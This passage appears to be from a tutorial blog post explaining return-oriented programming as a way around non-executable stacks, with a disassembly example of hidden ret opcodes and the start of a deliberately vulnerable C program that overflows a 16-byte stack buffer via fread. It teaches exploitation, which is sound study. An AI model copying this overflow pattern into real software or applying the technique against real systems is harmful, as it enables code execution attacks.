f = fopen ("sploitme.bin", "rb");
if (!f)
return 1;
fseek (f, 0, SEEK_END);
sz = ftell (f);
fseek (f, 0, SEEK_SET);
fread (buf, 1, sz, f); // <=- BO
fclose (f);
return 0;
}
int
main (void)
{
char big_buffer[0x4000] = { 0 };
return func ();
}
So, having this 'bad' example now we must select a quest (with respect to the rules of engagement). My quest will be simple - to write out 'hello world' to stdout, and exit the application properly without all those nasty little exceptions being thrown at the unsuspecting user (I'll talk about shell bind shellcodes and similar stuff during another occasion).
Let's get to work.
Let's start with inventing how this shellcode will work:
1. First, it should place the "hello world" someplace in the memory (some mov [address], "hell", etc)
2. It should call puts, or a similar function, with the above string address (push+call)
3. It should call ExitProcess, or a similar function (push+call)
Using the ret-to-anything technique the simplest things to do will be the function calls - you just have to place the function address on the stack, the arguments after it, and thats it.
However placing the "hello world" string may not be as simple (let's assume that we cannot place it on the stack, because the stack address is unpredictable). To figure out how to do that, we need to see what we can use - so let's scan the process memory for byte sequences that end with C3 or C2 (let's look in the executable area only). To do that, we need to create a scanner, that will write out the possibilities that we possess.
A sample scanner is placed below - you provide him with a raw memory dump file (for example a .mem file without any headers, just like the one OllyDbg make) - the file has to be named in this convention: something_ADDRESS.mem, i.e. something_1234ABCD.mem. Btw, if someone asks me who coded the below, I'm going to lie that it wasn't me ;p (it's as always awful... for example, instead of using diStorm or sth, I'm calling ndisasm using system ()... it's bad... I really have to start publishing good coded examples... well, but this way readers will learn how NOT to write ;p).
#include <gynlibs.cpp>
LONG_MAIN (argc,argv)
{
CHECK_ARGS(2, "usage: get_opcodes <filename_offset.mem>");
size_t sz, i, j;
unsigned char *data;
unsigned int offset;
data = FileGetContent (argv[1], &sz);
CHECK_FILEGET_DIE(argv[1], data);
sscanf (argv[1], "%*[^_]_%x", &offset);
printf ("using offset: %.8x\n", offset); fflush (stdout);
for (i = 1; i < sz; i++)
{
size_t maxdata = (i >= 10) ? 10 : i;
if ((i % 100) == 0)
fprintf (stderr, "%.8x / %.8x\r", i, sz);
if (data[i] == 0xC3 || data[i] == 0xC2) // ret
{
j = i - maxdata;
for (; j < i; j++, maxdata--)
{
FileSetContent ("__tmp.bin", &data[j], maxdata + 1 + (data[i] == 0xC2) * 2);
system ("ndisasm -b 32 __tmp.bin > __tmp.dis"); fflush (stdout); //lame lame, but works
unsigned char *dis_data;
size_t dis_sz;
dis_data = FileGetContentAsText ("__tmp.dis", &dis_sz);
if (!dis_data)
continue;
dis_data[dis_sz-1] = '\0'; // cheat, overwrite the last \0
if (!strstr ((char*)dis_data, "ret"))
continue;
printf ("-----> Offset: %.8x\n", offset + j);
puts ((char*)dis_data);
puts (""); fflush (stdout);
}
continue;
}
}
delete data;
return 0;
}
The above "ingeniously" written program takes 3 hours to scan 2MB of memory lol (hehe OK OK, I'll rewrite it later and throw it on my blog). The program requires the recent gynlibs.
Using the above scanner, I've scanned the executable sections of kernel32.dll, msvcrt.dll, ntdll.dll and sploitme.exe (using the script shown below):
@echo off
for %%i in (*.mem) do (
echo Processing %%i...
get_opcodes %%i >> ret_list.txt
)
echo Done.
As a result, I've got an 18MB text files with many different sequences (each disassembled using a few different starting points).
It's a good idea to move a step away from the black board at this time, and try to look at these opcode sequences as single instructions that are coded in some nanocode (term microcode is already used ;p) - each sequence is from now a single building block for us - and we will try to put the shellcode together using these building blocks. We will also treat the virtual address of the sequence as the instruction opcode. To distinguish the return-to-anything opcodes/instructions from the assembly/CPU opcodes/instructions, I'll call the former RTA opcodes and RTA instructions (RTA as in Return To Anything), and the later CPU opcodes and CPU instructions (I figured that calling them X86 opcodes/instructions would be too narrowing - since this technique is also usable on other architectures).
Let's get back to the main task - writing the hello-string to the memory. It's a good idea to grep (is that even a verb? hmm, I'm using it, so I guess it is ;p) the list for expressions like "mov [".
19:35:57 gynvael >cat ret_list.txt | grep -c "mov \["
3622
A lot. Lets narrow the search, to "mov [32-bit reg]".
19:38:11 gynvael >cat ret_list.txt | grep -c "mov \[e[a-z]\{2\}\]"
1627
Better, but still a lot. Let's say we will want to use something like "mov [32-bit reg], 32-bit reg":
19:38:21 gynvael >cat ret_list.txt | grep -c "mov \[e[a-z]\{2\}\],e[a-z]\{2\}"
1308
Cool. Now let's look on the list (my list is available for download at the bottom of the post, but I encourage the reader to create his own list and retrace my steps) and pick some "mov [esi], edi" or something (the address is taken from Vista with ASLR, so think about it only as an example):
-----> Offset: 76cfe865
00000000 8937 mov [edi],esi
00000002 B001 mov al,0x1
00000004 5F pop edi
00000005 5E pop esi
00000006 5D pop ebp
00000007 C20C00 ret 0xc
Oh. Cool. It's just as we wanted, a mov [edi],esi. And, in addition, we got a way to insert our value to edi and esi - pop edi and pop esi (remember that all ur stack r belong to us).
So, having the above CPU code sequence, we can use it as two different RTA instructions: first at 76cfe869 - it could be used to place a value from the stack in edi and esi regs, and the second at 76cfe865 - that an be used to write a DWORD into the memory.
One must notice one thing, that is pretty common in this technique - side effects. In the above sequence, there are three side effects:
- value of 1 will be places in AL registry
- three DWORDs will be taken from the stack, and placed in 3 registers - EDI, ESI, EBP (when considering the 'set EDI and ESI' RTA instruction, only the EBP overwrite is considered as a side effect, but when thinking about 'place a EDI on [ESI]' RTA instruction, then all three popped values are considered to be side effects)
- after the return, the stack will move 12 btyes (ret 0xc CPU instruction)
The first side-effect we can easily ignore. However, in case of the two following ones, we must react in a way to balance them. It's quite simple actually, we just need to prepare more data on the stack (some randome/trash bytes will do) and remember that EDI/ESI/EBP values will be destroyed.
Having the above RTA instructions, we can create a POKE (just like the old 8-bit times) function, that will place a provided DWORD at the provided memory location. The internals of this function looks like this:
One row of colorful rectangles in a row is a fragment of the stack, that makes one RTA instruction invoction. Additionally, I've marked on the image what on the stack is used by what nanocode CPU instruction. As for the color meaning: the lemon cadmium rectangles are important parameters, the slate violet ones are just trash/filling/align/unused DWORDs, and the mild ultramarine are the return addresses - or to call them in the current notation, the RTA opcodes.
As one can see on the image, even if I use only two RTA instructions to construct the POKE functions, there are four RTA opcodes. This is made this way due to the need of stack synchronizing, which is required because of the side-effect of the retn 0xc CPU instruction. To balance this side-effect, I provide the address (RTA opcode) of a single ret instruction, so that when the EIP executes retn 0xc, it will just to the single ret CPU opcode, add 0xC to ESP, and execute that single ret, that will take the next value from the stack that lies after the current RTA instruction invocation is finished - and at the beginning of the next one (I'm having trouble to explain it in more simple words, I hope you'll understand why this is needed and how does it work).
So, we have a POKE function, that takes 16 DWORD on the stack. No we just use it 3 times to place the "hell" "o wo", "rld\0" opcodes anywhere in the memory we like.
The next thing is the call to puts and ExitProcess. These RTA instructions will be simpler - you just have to insert the puts address, and then some return address, and then the function parameter. However, one must remember that since puts is cdecl, the caller must remove the parameter from the stack - so that our next RTA instructions will have the stack 'synchronized'. To do this, we just have to call some pop+ret sequence after puts. I've choose the following sequence:
-----> Offset: 76cf08f2
00000000 5D pop ebp
00000001 C20400 ret 0x4
Solving one problem (the pop ebp will remove the puts parameter - remember about side effects!) creates another - retn 0x4. But, It's easily solvable using the same trick as in POKE - just jump to some lone ret and place some DWORD trash on the stack, and thats that.
In case of the ExitProcess function we do not have to worry about the function returning, stack sync, etc, for obvious reasons ;>
OK, so we have all we need. Now let's write a C++ app that will put the exploit together.
The base of the program will be a insert_dword function, that writes a single DWORD to the sploitme.bin file. Using this instruction we can form a POKE function (split to two RTA instructions), and INVOKE_PUTS and INVOKE_EXITPROCESS RTA instructions. And then, we can use these functions to form an exploit (a link to the source is at the bottom of the post).
FILE *f = fopen ("sploitme.bin", "wb");
if (!f)
return 1;
// Overflow the buffer
fwrite ("............................", 1, 28, f);
// Write 0x41424344 to 00
poke_dword (f, 0x402400, *(unsigned int*)"hell");
poke_dword (f, 0x402404, *(unsigned int*)"o wo");
poke_dword (f, 0x402408, *(unsigned int*)"rld\0");
invoke_puts (f, 0x402400);
invoke_ExitProcess (f, 0);
// Done
fclose (f);
The POKE implementation looks like this:
void
set_edi_esi_ebp (FILE *f, unsigned int edi, unsigned int esi, unsigned int ebp)
{
insert_dword (f, ADDR
mov_esi_to_edi_set_edi_esi_ebp (FILE *f, unsigned int edi, unsigned int esi, unsigned ebp)
{
insert_dword (f, ADDR_MOV_EDI_ESI
poke_dword (FILE *f, unsigned int addr, unsigned int dw)
{
set_edi_esi_ebp (f, addr, dw, 0xdeaddead);
mov_esi_to_edi_set_edi_esi_ebp (f, 0xdeaddead, 0xdeaddead, 0xdeaddead);
}
The INVOKE_ RTA instructions are far shorter:
void
invoke_puts (FILE *f, unsigned int addr)
{
insert_dword (f, FUNC_PUTS);
insert_dword (f, ADDR_POP_EBP_RET_4);
insert_dword (f, addr);
insert_dword (f, ADDR_RET);
insert_dword (f, 0xdeaddead);
}
void
invoke_ExitProcess (FILE *f, unsigned int code)
{
insert_dword (f, FUNC_EXITPROCESS);
insert_dword (f, 0xdeaddead);
insert_dword (f, code);
}
The final exploit design looks like this:
The funny thing is... this works ;>
A few last remarks:
1. All the above addresses are the ones I've had in my current ASLR session (wonder if this information can be used for some evil purpose ;p), so I advise the reader to search for the required sequences on his own machine.
2. It's a good thing to make notes about the stack. Then the stack is the main axis of execution, and it's (ESP) changed by all these POPs, RETs and RETNs, one may easily mix stuff up.
3. This can be used to create a pretty decent shellcode language. Some SHELLCODE BASIC or sth.
4. Loops, ifs etc are also possible, I'll write about them some other time.
The package (source + sequence list): ret_ro_exploit.zip (1.5MB)
Thats it for today.
P.S. Two links worth reading - they link to the Hovav Shachams research, he has talked about this on the BlackHat last year:
The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)
Return-Oriented Programming: Exploits Without Code Injection
Thanks for sharing, mate!
Add a comment: | https://gynvael.coldwind.pl/?id=149&lang=en | CC-MAIN-2021-25 | refinedweb | 2,756 | 65.76 |
Can you explain a little more about what you are trying to accomplish? What type of objects are you trying to edit?
You may want to look into using block types to define a set of properties (), though I don't know if that solves what you are trying to accomplish.
I think he is looking for multiple property control which is similar to EPiServer MultipleProperty
I would like to edit collection of simple objects, for example:
public class Item { public int Id { get; set; } public string Name { get; set; } public bool Enabled { get; set; } }
Or more complex:
public class Item { public int Id { get; set; } public string Name { get; set; } public bool Enabled { get; set; } public LinkItemCollection Links { get; set; } public ContentArea Items { get; set; } public Url Image { get; set; } [Required] public string Description { get; set; } }
Solution with blocks is working, but is not useful, because it takes more time to create each additional item and blocks, located in folders, and their amount grows up.
I found in episerver sources CollectionEditorDescriptor and CollectionEditor.js. When I try to mark page property with [EditorDescriptor(EditorDescriptorType = typeof(CollectionEditorDescriptor<Item>))] it renders good CollectionEditor control, but without column captions and it doesn't save data. It would be great to use this out of the box solution.
I believe a contentarea with blocks is still a way to go.
It bothered me as well the process of creating a block and drag&dropping it to the content area. However, with the new shortcut button that came with 7.5, inside the content area, named "You can drop content here, or create a new block", it gets really neat.
When you click on "create a new block", you get all the properties listed + the block gets saved to current page blocks, under "For this page".
As for the amount of them, it should be that these current-page blocks get deleted when the page gets deleted. As for the blocks shared among the pages, you could create a cleanup scheduled job that deletes them if no pages reference it.
If you're not finding any solutions that work for you, you might just want to look into creating your own custom EPiServer property with Dojo.
You should be able to get a good idea about what's involved in making a property that works for your situation.
Hello everyone!
Maybe anybody knows how I can edit collection of complex objects in episerver edit UI? | https://world.episerver.com/forum/developer-forum/-Episerver-75-CMS/Thread-Container/2014/5/Editing-collection-of-complex-objects/ | CC-MAIN-2020-16 | refinedweb | 411 | 64.54 |
Inheritence
————-
TailList is a subclass of SList.
SList is the superclass of TailList.
A subclass can modify a superclass in three different ways:
1. It can declare new fields.
2. It can declare new methods.
3. It can override old methods with new implementations. It is not necessary to orverride all.
public class TailList extends SList{ // the head and size is inherited private SListNode tail; // override the insertEnd method public void insertEnd(Object obj){ // solution } }
Inheritence and Constructors
——————————–
Java executes the TailList constructor, but first it executes SList() constructor.
public TailList(){ //SList constructor is called //additional Tail = null; }
Zero parameter constructor is called by default. To change:
public TailList(int x){ super(x); // calls the super class constructor and must be executed FIRST. tail = null; }
Invoking overridden methods
——————————-
public void insertFront(Object obj){ super.insertFront(obj); // for the superclass and not necessarly the first line. if(size == 1){ tail = head; } }
The “protected” keyword
—————————-
public class SList{ protected SListNode head; protected int size; }
Both “protected ” field and method is visible to the declaring class and to all its subclasses.
In contrast, “private ” fields are not visible to subclasses.
Dynamic method lookup
————————
For Java “Every TailList is an SList”.
SList s = new TailList(); // TailList is a subclass of SList and SList is not abstract s.insertFront(obj);
Abstract class
—————-
A class whose sole purpose it to be inherited. This is an ADT. An abstract method lacks the implementation.
public abstract class List{ protected int size; public int lenght(){ return size; } public abstract void insertFront(Object obj); } List mylist; mylist = new List(); //compile time error
A non abstract class may never
1. contain an abstract method.
2. inherit one without providing an implementation.
List mylist = new SList(); // correct! mylist.insertFront(obj);
One list sorter can sort every kind of list.
public void listSort(List l){ //code }
Subclasses of List: SList, DList,TailList
TimedList: record amount of time doint list operations
TransactionList: Logs all the changes on a disk for power outage. | https://linuxjunkies.wordpress.com/tag/data/ | CC-MAIN-2018-34 | refinedweb | 328 | 58.69 |
Opened 6 years ago
Closed 4 years ago
Last modified 20 months ago
#5144 closed feature request (fixed)
Pattern synonyms
Description
Lennart would like pattern synonyms. Something like
pattern con var1 … varN = pat
where ‘pattern` is a new keyword.
- Perhaps there should be a way to give a type as well, so the
concould be
(con :: type).
- The
rhsis type checked as a usual pattern, i.e., in the global environment.
- The
patshould bind exactly
var1..
varN.
- Recursive pattern synonyms are not allowed.
With `con` in scope it can be used like any other constructor in a pattern, and the semantics is simply by expansion.

It would have been very nice if `con` could be used in expressions as well, but I don't see how that could work with view patterns. Perhaps view patterns could be extended to make them bidirectional.
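To make the proposal concrete, here is a hypothetical example (the names `Pair` and `swap` are invented for illustration; this is a sketch of the proposed syntax, not an existing feature):

```haskell
-- Under the proposed syntax, Pair names a two-element-list pattern
-- and binds exactly its two variables, x and y.
pattern Pair x y = [x, y]

-- By the expansion semantics, matching on Pair is the same as
-- matching on [x, y] directly.
swap :: [a] -> [a]
swap (Pair x y) = [y, x]
swap xs         = xs
```

The bidirectional question above is whether `Pair y x` could also appear on the right-hand side of `swap` in place of `[y, x]`.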
My rationale for wanting pattern synonyms is that I sometimes have pattern matching with a lot of complex repetition in them. I’ve even resorted to using CPP in the past, and that just shows that Haskell is lacking some abstraction mechanism.
If pattern synonyms could be made to work in the presence of view patterns, it would offer a mechanism for normal pattern matching on abstract types, since the abstract type could export some pattern synonyms and you'd not be able to tell if those were real constructors or not.
I’ve not tried implementing this, but I think SHE has something like it.
Change History (51)
comment:1 Changed 6 years ago by
comment:2 Changed 6 years ago by
I've been thinking about how to design this extension to get the most bang for the buck. Here's a slightly different proposal that I think has some nice properties, and is still quite simple.
Pattern synonyms define new varids rather than conids.
For example, we could add this to `Data.Sequence`:
pattern empty   = t | Nothing2 <- viewLTree t
pattern x <| xs = t | Just (x,xs) <- viewLTree t
pattern xs |> x = t | Just (x,xs) <- viewRTree t
which would subsume all the existing `ViewL`/`ViewR` stuff. Note that the pattern right-hand side may include a pattern guard (or view patterns).
The big win here is that you can use the same varid as an existing function, so you get to define both constructors and destructors, and they look identical. Furthermore you get pattern matching (view-style) on abstract types.
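A sketch of what a call site could look like with the `Data.Sequence` synonyms above (hypothetical — it assumes the proposed rule that a varid with a synonym in scope matches via the synonym rather than binding a variable):

```haskell
-- Matching on an abstract Seq with no explicit ViewL plumbing;
-- empty and (<|) here are the pattern synonyms, not the functions.
total :: Seq Int -> Int
total empty     = 0
total (x <| xs) = x + total xs
```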
You could do this with conids instead of varids if there was also some way to define the expression form - that's the tricky part, which is why I thought varids would be a better choice. Also varid patterns give you a clue that something magic is going on, but in a nicer way than view patterns.
Not many changes to Haddock etc. would be required (I think if we used conids it would be a bit trickier: should they be indistinguishable from ordinary datatypes or not?)
A design question is whether the pattern should be required to have the same type as the function, if both exist. There could be all sorts of hairy issues there. If they aren't the same, can you give a type signature to a pattern?
This extension to pattern synonyms covers all the use cases of view
patterns in which there is a single identifier to the left of the
arrow (which is about 90% of the examples in ViewPatterns). Perhaps
there's some way to extend this to allow passing arguments from the
pattern site too... it's just a syntax question (but a gnarly one). So while with view
patterns you can define an n+k pattern, with pattern synonyms it has
to be restricted to a particular `k`:
pattern oneplus n = m | m > 0, let n = m - 1

f 0 = ...
f (oneplus n) = ...
I do think for the cases where pattern synonyms apply, the syntax is much nicer than view patterns. In particular, there's no need for intermediate Maybes or tuples, which the view pattern proposal suggests to make implicit.
Another one:
pattern x `and` y = it | x <- it, y <- it
(this was called `both` in ViewPatterns).
In conclusion: I'm not sure whether this is the right thing, but from certain angles it looks very attractive. Thoughts?
comment:3 follow-up: 4 Changed 6 years ago by
I'm not sure I follow exactly what you're proposing. What does
pattern x `and` y = it | x <- it, y <- it
mean exactly? And how would you use it? Could you use it to require an argument matches both `(Just x, _)` and `(_, True)`, or am I on completely the wrong track?
comment:4 Changed 6 years ago by
comment:5 Changed 6 years ago by
There's a start of a wiki page at.
comment:6 Changed 5 years ago by
It occurs to me that for great symmetry you could call these data synonyms (data synonyms : data constructors :: type synonyms : type constructors). Unfortunately the 'data' keyword is taken.. :-)
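The analogy, spelled out as a sketch (names invented for illustration):

```haskell
type    Point  = (Int, Int)   -- type synonym: names a type expression
pattern Origin = (0, 0)       -- "data synonym": names a pattern
```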
comment:7 Changed 5 years ago by
Any news on this? It would be very nice to have these.
comment:8 Changed 5 years ago by
comment:9 Changed 5 years ago by
I'm afraid not. I'm deep under water with other stuff (including GHC stuff), and this feature is relatively ambitious, both on the design side and implementation. It might make a good intern project!
Simon
comment:10 follow-up: 12 Changed 4 years ago by
I've started working on this, and I have the simplest case (pattern-only synonyms) almost working, with most of the groundwork done for simple bidirectional pattern synonyms as well.
What's the correct protocol in this case? Should I mark myself as the owner on this ticket until I have my patches ready for submission for review? Or only after an initial working version is accepted?
comment:11 Changed 4 years ago by
comment:12 Changed 4 years ago by
Great to hear that you're working on this! Just out of interest, are you implementing ViewPatternsAlternative too? Pattern synonyms become rather powerful when you can use pattern guards inside them, which is what ViewPatternsAlternative lets you do.
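For reference, a guard inside a synonym (in the comment-2 style — hypothetical syntax, not what plain PatternSynonyms supports) would allow matching on a computed view, e.g.:

```haskell
-- Hypothetical: match a string that parses as a number,
-- binding the parsed value.
pattern Number n = s | [(n, "")] <- reads s
```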
> What's the correct protocol in this case? Should I mark myself as the owner on this ticket until I have my patches ready for submission for review? Or only after an initial working version is accepted?
You can assign the ticket to yourself if you're working on it, yes.
comment:13 Changed 4 years ago by
comment:14 Changed 4 years ago by
comment:15 Changed 4 years ago by
Progress update:
Code is in the `pattern-synonyms` branch at. Until I am ready to submit for initial review, I will do all kinds of funky rebasing and history rewriting, so use it for read-only snapshots as of now.
Using the names from the wiki link, pattern-only pattern synonyms and simple pattern synonyms now (mostly) work. There's a bug in the typing of pattern-synonyms-as-expressions, so e.g. with the following program:
{-# LANGUAGE PatternSynonyms #-}

pattern One x = [x]

singleton :: a -> [a]
singleton x = One x
I get an error that the type of `One` is too rigid; I expect this to be easy to fix:
Couldn't match type ‛t0’ with ‛a’
  because type variable ‛a’ would escape its scope
This (rigid, skolem) type variable is bound by
  the type signature for singleton :: a -> [a]
  at /tmp/PatSyn.hs:18:14-21
Expected type: [a]
  Actual type: [t0]
The one big missing feature is exporting pattern synonyms. First of all, since pattern synonyms are in the namespace of constructors, not types, we need special syntax to export them; I propose the following:
module M (pattern P) where

pattern P x = _:_:x:_
(note that you can have a type called `P` as well, but you'd get a clash if you had a constructor with that name).
To be honest, I have no idea yet how to actually implement exporting, since I haven't looked at that part of GHC yet -- any pointers are appreciated.
After I've fixed the bug mentioned and implemented exporting, I'll do a formal submission of my (cleaned-up) patch for review.
After that baseline, the 'bidirectional pattern synonyms' proposal from the wiki page should fit right into it as well. I have no opinion yet on how difficult adding associated patsyns will be; I'll need to do more research first.
comment:16 Changed 4 years ago by
Progress update: the following module demonstrates all the features implemented so far:
{-# LANGUAGE PatternSynonyms #-}
module PatSyn where

-- The example from the wiki page
data Type = App String [Type] deriving Show

pattern Arrow t1 t2 = App "->" [t1, t2]
pattern Int = App "Int" []

collectArgs :: Type -> [Type]
collectArgs (Arrow t1 t2) = t1 : collectArgs t2
collectArgs _ = []

isInt Int = True
isInt _ = False

arrows :: [Type] -> Type -> Type
arrows = flip $ foldr Arrow

-- Simple pattern synonyms
pattern Nil = []
pattern Cons x xs = x:xs

zip' :: [a] -> [b] -> [(a, b)]
zip' (Cons x xs) (Cons y ys) = Cons (x, y) (zip' xs ys)
zip' Nil _ = Nil
zip' _ Nil = Nil

pattern One x = [x]

one :: [a] -> Maybe a
one (One x) = Just x
one _ = Nothing

singleton :: a -> [a]
singleton x = One x

-- Pattern only synonyms
pattern Third x = _:_:x:_

third :: [a] -> Maybe a
third (Third x) = Just x
third _ = Nothing

-- This causes a type error:
invalid x = Third x

-- PatSyn.hs:30:13:
--     Third used in an expression, but it's a non-bidirectional pattern synonym
--     In the expression: Third x
--     In an equation for ‛invalid’: invalid x = Third x
-- Failed, modules loaded: none.
The following module also works, but demonstrates the clunkiness caused by the lack of infix pattern synonyms:
{-# LANGUAGE ViewPatterns, PatternSynonyms #-}
import qualified Data.Sequence as Seq

pattern Empty = (Seq.viewl -> Seq.EmptyL)
pattern Cons x xs = (Seq.viewl -> x Seq.:< xs)
pattern Snoc xs x = (Seq.viewr -> xs Seq.:> x)

zipZag :: Seq.Seq a -> Seq.Seq b -> Seq.Seq (a, b)
zipZag (Cons x xs) (Snoc ys y) = (x, y) Seq.<| zipZag xs ys
zipZag _ _ = Seq.empty
Of course, implementing infix pattern synonyms should be easy.
Still missing: exporting of pattern synonyms.
comment:18 Changed 4 years ago by
I've implemented infix notation as well, so now you can write this:
{-# LANGUAGE ViewPatterns, PatternSynonyms #-}
import qualified Data.Sequence as Seq

pattern Empty = (Seq.viewl -> Seq.EmptyL)
pattern x :< xs = (Seq.viewl -> x Seq.:< xs)
pattern xs :> x = (Seq.viewr -> xs Seq.:> x)

zipZag :: Seq.Seq a -> Seq.Seq b -> Seq.Seq (a, b)
zipZag (x :< xs) (ys :> y) = (x, y) Seq.<| zipZag xs ys
zipZag _ _ = Seq.empty
comment:19 Changed 4 years ago by
Fabulous! Köszönöm!
Deplorable syntax bikeshedding:
Perhaps, instead of
pattern,
data alias? I feel that would be more accurate and descriptive for many cases (when the synonym can also be used on the RHS), though possibly less so for others (pattern-only synonyms). It might also avoid having to reserve a keyword. (As with
TypeFamilies, as far as I can tell, "family" is not a keyword. I don't think it's possible to avoid the keyword with a new top-level entity like
pattern, but maybe I'm mistaken?)
comment:20 Changed 4 years ago by
Exports now work with the following syntax:
module Foo (pattern P) where

pattern P x y = (x, y, 42)
This exports
P both as a pattern and as an expression (if it's bidirectional, like in the case here)
The extra
pattern keyword is needed because pattern names live in the constructor namespace, so it's perfectly valid to have
data P = C

pattern P = ()
(due to entirely non-interesting reasons, the implementation of exporting is not yet pushed to)
Remaining work to do:
- Sort out recursive pattern definitions. Currently these are rejected implicitly by an internal GHC error, not exactly ideal... also, non-recursive usages of pattern synonyms mentioning each other don't work, but I see no reason why we wouldn't want to allow it:
pattern P1 = P2
pattern P2 = ()
- The typechecker for pattern synonym definitions is wrong: it returns monomorphic types (e.g. for
pattern Head x = x:_, it infers type
t -> [t] instead of
forall a. a -> [a]. This is worked around by a horrible hack when typechecking pattern synonym usages in patterns. Richard Eisenberg and Simon Peyton Jones have already offered to help with this.
comment:21 Changed 4 years ago by
We need to think about the import/export situation. One of the goals of pattern synonyms is to abstract constructors, so that a library can change a data type representation while allowing clients to continue to use pattern matching. Clearly we can't use the
T(P1,P2,..) syntax for exporting patterns (what is
T?), but perhaps we can use the
pattern syntax for exporting constructors. I haven't thought about this very hard.
When a pattern is imported, can it be used in an expression? Does the client know whether it can be used in an expression or not?
What do the Haddock docs for pattern synonyms look like?
comment:22 Changed 4 years ago by
If your question is whether there's a syntactic way to see if a given pattern synonym import can be used as an expression, then no, not at the moment. So if you do something like
import M(pattern P)

x = P
then the only error you will get if
P is not bidirectional is from the type checker:
/tmp/hs/M2.hs:5:5:
    P used in an expression, but it's a non-bidirectional pattern synonym
    In the expression: P
    In an equation for ‛x’: x = P
comment:23 follow-up: 25 Changed 4 years ago by
We must treat data constructors uniformly with pattern synonyms. For example, it should definitely be OK to have
module M( pattern P, foo, bar ) where
-- The "pattern P" exports data constructor P
data T = P | Q

foo :: T
foo = P

bar :: T -> Int
bar P = 1
bar Q = 2

module A where
import M   -- T is not in scope

w1 = bar P              -- Uses P as an expression
w2 = case foo of
       P -> 1           -- Uses P as a pattern
module M( T, pattern AbsP, pattern Q ) where

data T = P Int | Q

pattern AbsP = P
But I really wanted
AbsP to be uni-directional, and according to the current spec PatternSynonyms it is "implicitly bidirectional".
comment:24 follow-up:.
comment:25 follow-up: 27 Changed 4 years ago
Once a syntax for this is decided, this is trivial to add to my current implementation. is the name of the data constructor) without having to define
AbsP? Would that be taking things too far?
comment:26 Changed 4 years ago by
Well in the design here PatternSynonyms,
pattern P exports P for use both in patterns and expressions. By all means suggest alternative designs; that's what this thread is all about.
comment:27 Changed 4 years ago by
is the name of the data constructor) without having to define
AbsP? Would that be taking things too far?
That would treat pattern synonyms and data constructors differently, which I am keen to avoid. Under what you propose:
- If P is a data constructor then
pattern P would export P uni-directionally (pattern only)
- If P is a (bi-directonal) pattern synonym then
pattern P would export P bi-directionally.
I don't like that... a data constructor is precisely a (degenerate) bidirectional pattern.
I suppose you could put the directionality in the export list:
module M( pattern P,        -- Uni-directional
          constructor Q     -- Bidirectional
        ) where

pattern P x = [x]
pattern Q y = [y,y]
But I don't want to go this way. If you export P you get all of what P is. Otherwise we'll get into exporting it unidirectionally from one module, bidirectionally from another, then importing both of those, and combining the directinoality of those imports. Too complicated.
Maybe
datacon P, or
view P, rather than
pattern P would address Ian's worry?
comment:28 Changed 4 years ago by
Ah, I see, I had expected that something defined with "pattern" (e.g.
pattern Arrow t1 t2 = App "->" [t1, t2]) could only be used as a pattern. I think a different keyword, e.g. "synonym" (or perhaps "view", as Simon suggested) would be better in that case.
comment:29 Changed 4 years ago by
I realize I was wrong on my last comment: let's not even discuss exporting data constructors as pattern-only here, otherwise this ticket will lose focus.
So let's just come up with some syntax to discern unidirectional vs. bidirectional pattern synonym definitions.
comment:30 Changed 4 years ago by
Interestingly, Lennart's initial proposal () already used different notation for pattern-only synonyms:
pattern Conid varid1 ... varidn ~ pat
How about using this syntax?
comment:33 Changed 4 years ago by
Based on discussions with SPJ, I've updated the PatternSynonyms proposal and redesigned the implementation to postpone the instantiation of pattern synonyms until the desugarer. See the updated implementation at
Basically, the old implementation was pretty much unsalvageable for patterns mentioning non-Haskell98 data constructors. The new one works nicely with unconstrained and constrained existential types.
On the features front, I've added explicit syntax for unidirectional vs. bidirectional patterns. The tentative syntax is:
pattern Head x -> (x:_)    -- pattern-only synonym
pattern Single x = [x]     -- bidirectional synonym
So now you can rewrite the second one as
pattern Single x -> [x]
and it will not introduce a new virtual constructor to be used in expressions.
comment:34 Changed 4 years ago by
Added PatternSynonyms/Implementation page describing internals of the code
comment:39 Changed 4 years ago by
I've added separate tickets to the features from the PatternSynonyms page that are not going to be implemented in the initial version (which is now code-complete and just needs some docs and some comments here and there).
comment:40 Changed 4 years ago by
I've added test cases to the
pattern-synonym branch of
comment:41 Changed 4 years ago by
Code is now past initial review and is ready in the
wip/pattern-synonyms branch on the GHC Git repo.
comment:42 Changed 4 years ago by
This is now merged.
comment:43 Changed 4 years ago by
Reminder: we still need documentation and release notes entry.
comment:44 Changed 4 years ago by
What documentation is needed beside the new section in
docs/users_guide/glasgow_exts? Also, can you point me in the direction of the release notes? I'd like to add a note not just mentioning pattern synonyms but also explaining that it is a preview that will need feedback from actual usage and which has more features planned.
comment:45 Changed 4 years ago by
Just a section in
docs/users_guide/glasgow_exts should be enough. Release notes are in
docs/users_guide/7.8.1-notes.xml; Austin added the entry for pattern synonyms, you might expand it.
comment:46 Changed 4 years ago by
OK, will fix
7.8.1-notes.xml. Just to avoid any misunderstandings, I've already added a section to
glasgow_exts.xml.
comment:47 Changed 4 years ago by
Thanks Gergo!
comment:48 Changed 4 years ago by
The source of the confusion over the docs was that I forgot to push my commit that added the section to
glasgow_exts. Now I've pushed a commit that adds both that and cleans up the release notes.
Conor has lobbied for adding these, and I'd like them too. Allowing pattern matching on abstract types would be a killer feature. | https://ghc.haskell.org/trac/ghc/ticket/5144 | CC-MAIN-2017-34 | refinedweb | 3,335 | 61.06 |
Squeezing More Guice from Your Tests with EasyMock
One other thing was pointed out by several reviewers of my first article and I am in total agreement. Instead of TaxRateManager taking a Customer ID, it makes more sense for it to take a Customer instance and return the tax rate based on that instance. This makes the API a little cleaner.
For this, you need to update the TaxRateManager interface, and the fake object implementation of it.
public interface TaxRateManager {
    public void setTaxRateForCustomer(Customer customer, BigDecimal taxRate);
    public void setTaxRateForCustomer(Customer customer, double taxRate);
    public BigDecimal getTaxRateForCustomer(Customer customer);
}
And the new Implementation:
@Singleton
public class FakeTaxRateManager implements TaxRateManager {
    ....
    public void setTaxRateForCustomer(Customer customer, BigDecimal taxRate) {
        taxRates.put(customer.getCustomerId(), taxRate);
    }

    public void setTaxRateForCustomer(Customer customer, double taxRate) {
        this.setTaxRateForCustomer(customer, new BigDecimal(taxRate));
    }

    public BigDecimal getTaxRateForCustomer(Customer customer) {
        BigDecimal taxRate = taxRates.get(customer.getCustomerId());
        if (taxRate == null)
            taxRate = new BigDecimal(0);
        return taxRate;
    }
}
It's pretty minor stuff, but it creates a cleaner API to use the TaxRateManager now. The Invoice getTotalWithTax method now has to pass in the Customer rather than the ID:
public BigDecimal getTotalWithTax() {
    BigDecimal total = this.getTotal();
